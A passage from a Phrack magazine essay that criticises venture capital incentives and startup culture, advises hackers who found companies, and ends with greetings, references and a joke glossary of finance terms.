token?), you will need to have native ETH to do that transaction.
Similarly, if you want to invest in US securities you at some point need
US Dollars. If you want to get a piece of that sweet $NVDA action, you
need dollars. People want to buy American stocks. American companies
perform well: they're innovative; they're not too heavily regulated;
it's a business friendly environment. (Shareholder value comes first!)
The numbers go up.
Remember the token founder from earlier in the Asian Arrangement? Suppose
you are a *country* in the situation above, with a valuable currency. Not
only is your currency in demand and valuable, you are the issuing/minting
authority for that token. Similar to the token founder, you can print
valuable money and pay for things with it.
And speaking of being a founder, let's talk about that!
--[ 4 - Startup Blues
Based on what we've set up so far, I will discuss some of the problems I
see with many startups today and with startup culture.
Much of the problems stem from misalignment between shareholders and the
other stakeholders (employees, etc). A lot of this comes from the
fundamentals of venture capital. VC is itself an asset class, like fixed
income and equities. VCs pitch this to their limited partners, at some
level, based on the premise that their VC fund will generate yield for
them. The strategy is to identify stuff that will become huge and buy it
while it's still small and really cheap. Like trading shitcoins, it's
about finding what's going to moon and getting in early.
In a typical VC fund, a small handful of the investments will comprise the
entire returns of the fund, with all of the other investments being 0's.
The distribution is very power law. This means we are not looking for 1x,
2x, or 3x outcomes; these may even be seen as failure modes. We are only
interested in 20x, 50x, 100x, etc. outcomes. This is because anything
less will be insufficient to make up for all the bad investments that
get written down to zero.
For the same reason, it only makes sense for VCs to invest in certain
types of companies. Have you ever heard this one? "We invest in SOFTWARE
companies!...How is this SCALABLE? What do the VENTURE SCALE OUTCOMES look
like here?" This is because these kinds of companies are the ones with the
potential to 100x. They want you to deliver a 100x. Or how about this one?
"We invest in CATEGORY-DEFINING companies". At least in security,
"category-defining" means a shiny new checkbox in the compliance / cyber
insurance questionnaire. In other words, a new kind of product that people
MUST purchase.
The market is incentivized to deliver a product that meets the minimum bar
to meet that checkbox, while being useless. I invite you to think of your
favorite middleware or EDR vendors here. For passionate security founders
considering raising venture, remember that this is what your "success" is
being benchmarked against.
_.,------------------------------_
.%' '&.
.;' We partner with founders ^;
! building category-defining ;!
; companies at the earliest stages _;
^; _.^
''-.______________ __________.-'
/ /
/ /^
/ /^
/;^
/'
_________ _________
_-' '. _-' '.
,^ '^_ ,^ '^_
/' '"' /' '"'
^' ^\^ ^' ^\^
: ^| : ^|
: . . |) : . . |)
: \ |) : \ |)
: __\ ,; : __\ ,;
" ! ; " ! ;
" ^\ _____ /' " ^\ _____ /'
'| | ^\ _/^ '| | ^\ _/^
| ^'=====' | ^'====='
| . | | | . | |
_' |^__ _' |^__
---------_-' U '--_ -------------_-' U '--_ -----
._ _.-' '-._ _.-' '-
':.' \ ; / ': .' \ ; / [4]
It's due to the thirst for 100x that there are painful dynamics. A
fledgling startup may have founders they really like, but the current
business may be unscalable. Bad VCs will push founders towards strategies,
bets, models that have a 1% chance of working, but pay out 200x if they
do.
In the process they destroy a good business--one which has earned the
trust of dutiful employees and loyal customers--all for a lottery ticket
to build a unicorn. They will throw 100 darts at the dartboard and maybe 5
will land, but what is it like to be the dart? You may have good expected
value, but all of that EV is from spikes super far away from the origin.
Is it pleasant betting everything on this distribution?
VC's want founders to be cult leaders. Have you ever heard this line? "We
invest in great storytellers." Like what we saw with stocks and tokens,
much of the easily-unlockable potential upside in assets is speculative.
In essence, value can be created through narrative. Narrative *IS* value.
Bad VC's will push founders to raise more capital at ever higher
valuations (higher val = markup = fees), using narrative as fuel for the
fire. Storytelling means "pump the token", and the job of the CEO is to
(1) be the hype man and to raise (2) cash and (3) eyeballs. For this
reason, Sam Altman and Elon are fine CEOs, regardless of other factors,
because they are great at all three.
Much to the detriment of founders' and their employees' psyche, investors
expect founders to be this legendary hype man. This requires a religiosity
of belief that is borderline delusional. Have you ever tried to convince
one of those Silicon Valley YC-type founder/CEOs that they are wrong? They
will never listen to you because they have been socialized to be this way.
It is what is expected of them, and it is easy to fall into this trap
without even becoming aware of it. But if you think about it, does it make
sense that to be a business owner, you need to be a religious leader? Of
course not.
All of these reasons are why so many startup founders are young. They have
little to lose, so gambling it all is OK. Being a cult leader may be
traumatizing, but they have time (and the neuroplasticity) to heal. And
lastly, they do not have the life experience to have a mature personal
identity beyond "I am a startup founder". All of this makes it easy to
accept the external pressures to build a company this or that way. And
perhaps not the way they would have wanted to, relying instead on their
personal values. The true irony is that the latter is what creates true,
enduring company culture and not the made-up Mad Libs-tier Company Culture
Notion Page shit that so many startups have. And of course, good VCs are
self-aware of all of the issues and strive to prevent them. But the
overall problem remains.
One last externality is for communities based around an industry. When you
add billions of venture dollars into an industry, it becomes cringe.
It's saddening to me seeing the state of certain cybersecurity conferences
which are now dominated by..."COME TO OUR BOOTH, YOU CAN BE A HACKER.
PLEASE VIEW OUR AI GENERATED GRAPHICS OF FIGURES CLAD IN DARK HOODIES
STATIONED BEHIND LAPTOPS". Here I would use the pensive emoji U+1F614
to describe my feelings about the appropriation of hacker culture but
Phrack is 7-bit ASCII, so please have this: :c u_u . _.
--[ 5 - Takeaways
The point is, all of this made me feel very small and powerless after I
realized the sheer size of the problems I was staring at. Nowadays, to
me it's about creating good jobs for my friends, helping our customers,
and taking care of the community. Importantly, I realized that this is
still making a bigger positive impact than what I could have done alone
just as an individual hacker or engineer.
To me, businesses are economic machines that can create positive (or
negative) impact in a consistent, self-sustaining way. There are many
people who are talented, kind, and thoughtful but temporarily unlucky.
Having a company let me help these friends monetize their abilities and be
rewarded fairly for them. And in that way I helped make their life better.
Despite a lot of the BS involved in running a business, this is one thing
that is very meaningful to me.
You can understand computers and science and math as much as you want, but
you will not be able to fix the bigger issues by yourself. The systems
that run the world are much bigger than what we can break on our laptops
and lab benches.
But like those familiar systems, if we want to change things for the
better, we have to first understand those systems. Knowledge is power.
Understanding is the first step towards change. If you do not like the
system as it is, then it is your duty to help fix it.
Do not swallow blackpills. It's easy to get really cynical and think
things are doomed (to AGI apocalypse, to environmental disaster, to
techno/autocratic dystopia, whatever). I want to see a world where
thoughtful hackers learn these systems and teach each other about them.
That generation of hackers will wield that apparatus, NOT THE OTHER WAY
AROUND.
Creating leverage for yourself. Hackers should not think of themselves as
"oh I am this little guy fighting Big Corporation" or whatever. This is
low agency behavior. Instead become the corporation and RUN IT THE WAY YOU
THINK IT SHOULD BE RUN. Keep it private and closely held, so no one can
fuck it up. Closely train up successors, so in your absence it will
continue to be run in a highly principled way that is aligned with your
values and morals. Give employees ownership, as it makes everyone aligned
with the machine's long-term success, not just you.
Raising capital. Many things do really need capital, but raise in a
responsible way that leaves you breathing room and the freedom to operate
in ways that are aligned with your values. Never compromise your values or
integrity. Stay laser focused on cash flows and sustainability, as these
grant you the freedom to do the things right.
HACKERS SHOULDN'T BE AFRAID TO TOUCH THE CAPITAL MARKETS. Many hackers
assume "oh that fundraising stuff is for charismatic business types". I
disagree. It's probably better for the world if good thoughtful hackers
raise capital. Giving them leverage to change the world is better than
giving that leverage to some psycho founder drinking the Kool-Aid. I
deeply respect many of the authors in Phrack 71, and I would trust them to
do a better job taking care of things than an amorphous amalgam of angry
and greedy shareholders.
For all things that don't need capital, do not raise. Stay bootstrapped
for as long as possible. REMEMBER THAT VALUATION IS A VANITY METRIC. Moxie
Marlinspike wrote on his blog [3] that we are often guilty of always
trying to quantify success. But what is success? You can quantify net
worth, but can you quantify the good you have brought to others lives?
For personal goals, think long term. People tend to overestimate what they
can do in 1 year, but underestimate what they can do in 10. DO NOT start a
company thinking you can get your hands clean of it in 2-3 years. If you
do a good job, you will be stuck with it for 5-10+ years. Therefore, DO
NOT start a company until you are sure that is what you want to do with
your life, or at least, your twenties/thirties (depending on when you
start). A common lament among founders, even successful ones, is:
"Sometimes I feel like I'm wasting my twenties". There's an easy Catch-22
here: you may not know what you really want until you do the company; but
once you do the company, you won't really be able to get out of it. Be
wary of that.
Creating value. This is one of those meaningless phrases that I dislike.
Value is what you define it to be. Remember to work on things that have
TAMs, but remember that working on art is valuable too! It is not all
about the TAM monster--doing cool things that are NOT ECONOMICALLY
VALUABLE, but ARTISTICALLY VALUABLE, is equally important. There is not
much economic value in a beautiful polyglot file, but it is artistically
delightful. This is part of why people hate AI art: it may be economically
valuable, but it is often artistically bankrupt. (Some people do use
generative tools in actually original and artistic ways, but this is the
exception not the norm currently.)
Founders vs Investors. Here is my advice: Ignore any pressure from
investors to make company "scalable" or whatever. Make sure your investors
have no ability to fire you or your co-founder(s). Make sure you and
co-founder are always solid and trust each other more than investors. You
and your cofounders need to be BLOOD BROTHERS (/sisters/w.e). If an
investor is trying to play politics with one of you to go against the
other cofounder, cut that investor out immediately and stop listening to
them.
Any investor who pushes for scalability over what you think is the best
interest of the company is not aligned with you. High-quality investors
will not push for this because they are patient and in it for the long
game. If you are patient, you can make a very successful company, even if
it is not that scalable. High-quality investors will bet on founders and
are committed; only bad ones will push for this kind of shit.
I'm going to avoid giving more generic startup advice here. Go read Paul
Graham's essays. But remember that any investor's perspective will not be
the perspective of you and your employees. Pivoting 5 times in 24 months
is not a fun experience to work at: your employees will resign while your
investors celebrate your "coming of age journey"--unless everyone signed
up for that terrifying emotional rollercoaster from the start.
They say that "hacker" is a dying identity. Co-opted by annoying VC-backed
cybersecurity companies that culturally appropriate the identity, the term
is getting more polluted and diluted by the day. Meanwhile, computers are
getting more secure, and they are rewriting everything in Rust with
pointers-as-capability machines and memory tagging. Is it over?
I disagree. As long as the hacker *ethos* is alive, regardless of any
particular scene, the identity will always exist. However, now is a
crucible moment as a diaspora of hackers, young and old, venture out into
the world.
Calling all hackers: never forget who you are, who you will become, and
the mark you leave.
--[ 6 - Thanks
Greetz (in no particular order):
* ret2jazzy, Sirenfal, ajvpot, rose4096, Transfer Learning, samczsun,
tjr, claire (aka sport), and psifertex.
* perfect blue, Blue Water, DiceGang, Shellphish, and all CTF players.
* NotJan, nspace, xenocidewiki, and the members of pinkchan and Secret Club.
* Everyone at Zellic, past and present.
Finally, a big thank you to the Phrack staff (shoutout to netspooky and
richinseattle!) for making this all possible.
--[ 7 - References
[1] https://www.sec.gov/Archives/edgar/data/1559720/000119312520315318/
d81668d424b4.htm
[2] https://www.sec.gov/Archives/edgar/data/1559720/000119312522115317/
d278253ddef14a.htm
[3] https://moxie.org/stories/promise-defeat/
[4] https://twitter.com/nikitabier/status/1622477273294336000
--[ 8 - Appendix: Financial institution glossary for hackers
(Not serious! For jokes... :-)
- IB: Investment Bank. Basically collect fat fees to do up ("advise on")
M&As and other transactions. Help match buyers and sellers for your
private equity. They are like CYA for your deal.
- PE: Private Equity. Basically buy not-overly-seriously ("poorly") run
companies, fire the management, then run it "professionally" (i.e.
make it generally shitty for customers and employees and community
for the benefit of shareholders)
- HF: Hedge Fund. Trade out pricing inefficiencies
- MM: Market Maker. Basically the same thing
- VC: Basically gamble on tokens (crypto or stocks) and back cool and/or
wacky ideas that the rest of these people find too stinky to invest
in
- PnD: Pump and Dump.
- TVL: Total Value Locked. Basically how much money is currently in a
blockchain or smart contract system.
- TPS: Transactions Per Second. A measure of how scalable or useful a
blockchain or database is. An oft-abused metric hacked by vaporware
shillers for hype and PnD purposes.
- TAM: Total Addressable ~~Memory~~ Market. Basically how much money a
given idea can make.
- NFA: Not finanical advice.
|=[ EOF ]=---------------------------------------------------------------=|
[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2024, Phrack Magazine.